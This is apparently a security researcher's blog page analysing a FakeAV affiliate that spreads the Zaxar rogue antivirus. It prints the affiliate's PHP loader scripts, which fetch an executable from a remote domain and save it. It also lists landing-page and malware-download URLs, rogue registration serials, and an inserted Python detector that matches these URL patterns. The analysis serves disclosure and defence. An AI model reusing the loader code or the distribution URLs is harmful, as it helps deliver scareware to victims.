Showing posts with label Zaxar. Show all posts

Friday, 9 March 2012

FakeAV affiliate distributing the Zaxar family

Advert found in Blackhole

First contact the 24 Feb

Then recontacted on the 25th, on the 6th, and more seriously about business on 7 Mar:

9 Mar, loader operational.

"Marketing company": no name, no logo... looks like a private affiliate.
• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ

Login:

News:


Statistics:

Promo:

Statistics by promo:

Payement:

Profile:

FAQ:

load1.txt:
<?php

/*
 * Fetches the exe and writes it to a file
 *
 */


$fileName="scanner.1";
$afid="you_afid"; // 1
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain=file_get_contents($urlActualDomain);

if (!$actual_domain) my_error("Can't get domain.");
$exe_url="http://$actual_domain/ldpatch/softpatch.php?afid=".$afid;

$baka_exe=file_get_contents($exe_url);

if (strlen($baka_exe)> 0){
    $h = fopen($fileName,"w");
    fwrite($h,$baka_exe);
    fclose($h);    
    echo "OK";
}else{
    my_error("Can't get exe.");
}      
exit;
////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}

?>

load2.txt:
<?php

/*
 * Load2
 * writes the current domain to a file
 *
 */


$fileDomain="domain.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$actual_domain =file($urlActualDomain);

if (sizeof($actual_domain)== 0 ) my_error("Can't get domain.");

$h = fopen($fileDomain,"w");
$text=implode("", $actual_domain);
fwrite($h,"http://".$text);
fclose($h);

echo "OK";
exit;

////////////////////////////////////////////////////////////////////////////////
function my_error($error_str)
{
     echo ("Update baka - Error:".$error_str."\r\n");
     exit;
}
////////////////////////////////////////////////////////////////////////////////
?>

load3.txt:
<?php
/*
 *  Load3
 *  appends the path to the URL (e.g. /scanner15/?afid=3)
 */


$fileName="my_file.1";
$urlActualDomain = "http://net-wintools.biz/promo/domain/?category=1&api_key=[you_api_key]";

$h = fopen($fileName,"w");
$text = file($urlActualDomain);
$text=implode("", $text);

fwrite($h,"http://".$text."/scanner15/?afid=3");
fclose($h);
echo "OK";
exit;
?>

This affiliate currently spreads Antivirus Protection (if you want the sample)

Landing pages:
• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME
http://spacein-web1.uni.me/monitor10/?www=465
http://spacein-web1.uni.me/monitor11/?www=465
http://spacein-web1.uni.me/monitor15/?www=465

• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK
http://video-nklpc1.tk/xxx2/?www=465
http://video-nklpc1.tk/xxx5/?www=465

• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK
• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK
http://uber-scanpcxz3.tk/monitor10/?www=465
http://uber-scanpcxz3.tk/monitor11/?www=465
http://uber-scanpcxz3.tk/monitor15/?www=465

Malware download:
• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN
http://goadvanced-softz.in/sis/spch.php?www=465
http://goadvanced-softz.in/sis/in/out/465.exe

• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN
http://white-doggysoft.in/sis/spch.php?www=465
http://white-doggysoft.in/sis/in/out/465.exe
http://white-doggysoft.in/soft/loader.exe
http://white-doggysoft.in/soft/installer_m.exe
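As an added defender-side example (not from the post and not the affiliate's own scripts): the three loader scripts and the landing/download lists above share a handful of URL shapes in which the affiliate id travels as afid, as www, or as the .exe file name. The Python below classifies proxy-log URLs by those path families and pulls that id out so hits can be grouped per affiliate; the log line format and all sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path families taken from the affiliate scripts and the landing/download
# URL lists in this post; a regex group captures an id carried in the path.
ZAXAR_PATH_PATTERNS = {
    "domain_api":  re.compile(r"^/promo/domain/?$"),          # loader asks for current domain
    "softpatch":   re.compile(r"^/ldpatch/softpatch\.php$"),  # loader fetches the exe
    "landing":     re.compile(r"^/(?:scanner|monitor|xxx)\d+/?$"),
    "spch":        re.compile(r"^/sis/spch\.php$"),
    "payload_exe": re.compile(r"^/sis/in/out/(\d+)\.exe$"),
}
# The affiliate id travels as ?afid= (loader) or ?www= (landing/download).
AFFILIATE_PARAMS = ("afid", "www")

def classify_url(url):
    """Return (family, affiliate_id) for a known URL shape, else None."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    for family, pattern in ZAXAR_PATH_PATTERNS.items():
        m = pattern.match(parts.path)
        if not m:
            continue
        aff = next((qs[p][0] for p in AFFILIATE_PARAMS if p in qs), None)
        if aff is None and m.groups():
            aff = m.group(1)  # e.g. 465 from /sis/in/out/465.exe
        return family, aff
    return None

def scan_proxy_log(lines):
    """Return [(client_ip, host, family, affiliate_id)] for matching lines."""
    hits = []
    for line in lines:
        # Assumed (constructed) log format: "<client_ip> <method> <url> <status>"
        fields = line.split()
        if len(fields) < 3:
            continue
        hit = classify_url(fields[2])
        if hit:
            hits.append((fields[0], urlsplit(fields[2]).hostname, hit[0], hit[1]))
    return hits

# Constructed sample lines (not real traffic) built from the URL shapes above.
SAMPLE_LOG = [
    "10.0.0.5 GET http://spacein-web1.uni.me/monitor10/?www=465 200",
    "10.0.0.5 GET http://goadvanced-softz.in/sis/spch.php?www=465 200",
    "10.0.0.5 GET http://goadvanced-softz.in/sis/in/out/465.exe 200",
    "10.0.0.7 GET http://example.org/index.html 200",
]
```

Grouping the hits by affiliate id shows the landing page, the spch.php stage and the final .exe all tied to the same id, which is the pivot a responder wants when hunting for other hosts that reached the same affiliate's infrastructure.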

Also, a weird string was found on the promo server: Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs
Maybe it's the same program, or maybe he paid the BakaSoft people and they sold the system.

Index Of/

Antivirus Protection



According to S!Ri:
Antivirus Protection is a fake security software (rogue). It is from the same family as: Security Monitor 2012, Security Solution 2011, Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.


Fake BSoD

Unpack

Anti

Serial

To register (and help removal), copy and paste this code: LIC-99D0-1239-KJAS-354S-SQD4-CJKF-KF67-GJ78-FGHK-ZDU6

Kaspersky Lab Technical Support failed by giving an old serial (did they even debug the FakeAV?)

The following URLs were found:
• dns: 1 » ip: 85.17.58.199 - adresse: PRO-BESTMUSIC.US
http://pro-bestmusic.us/ea.php?p=12&aid=

• dns: 1 » ip: 85.17.58.199 - adresse: FINELABOZP.IN
http://finelabozp.in/ea.php?p=1&aid=1

• dns: 1 » ip: 195.226.218.138 - adresse: ANTIVIRUSPROTECTION2012.COM
http://www.antivirusprotection2012.com/buy/index/1/9B11F1579114D8F08FE8069672F71172

• dns: 1 » ip: 184.22.135.174 - adresse: SAFEBILLINGSERVICE.COM
http://safebillingservice.com/buy/?affiliate_id=1&machine_id=&product_domain=antivirusprotection2012.com

Thanks to kyREcon :)

Saturday, 21 May 2011

Security Solution 2011



Security Solution 2011 is a fake security software (rogue). It is from the same family as: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.


Security Solution 2011 displays a lot of disturbing warning messages pushing users to purchase a license.
To register (and help removal), enter this serial code: LIC2-00A6-234C-B6A9-38F8-F6E2-0838-F084-E235-6051-18B3

Fake suspended page:

Sunday, 3 April 2011

Antimalware Tool



Antimalware Tool is a fake security software (rogue). It is from the same family as: Antivirus Antispyware 2011, AntiVirus System 2011, Security Inspector 2010, AntiVirus Studio 2010, Desktop Security 2010, Total PC Defender 2010, Desktop Defender 2010, Contraviro, UnVirex.


Antimalware Tool displays a lot of disturbing warning messages pushing users to purchase a license.
If your PC is infected with Antimalware Tool, follow the pcthreat guide to remove the infection.